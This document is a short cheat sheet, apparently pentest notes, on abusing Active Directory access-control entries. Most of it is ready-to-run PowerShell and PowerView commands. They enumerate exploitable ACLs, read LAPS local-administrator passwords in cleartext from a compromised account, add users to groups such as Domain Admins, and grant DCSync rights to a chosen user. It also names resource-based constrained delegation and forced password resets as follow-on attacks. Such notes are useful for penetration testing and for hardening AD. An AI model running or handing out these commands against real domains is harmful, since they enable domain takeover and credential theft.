ACL Abuse

Enumeration

ADModule
PowerView_Dev
PowerView
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get DistinguishedName
Get-ADUser -Identity USER
# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
Find-InterestingDomainACL -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.
LAPS Module
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group
ADModule
PowerView_dev
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
# Check
Get-ADGroupMember -Identity "LocalAdmins"
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack

GenericAll over User Object

Can reset their password without knowing the old one

WriteDACL over DC

Can give DCSync privs to user
RACE
PowerView3
Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync

Resources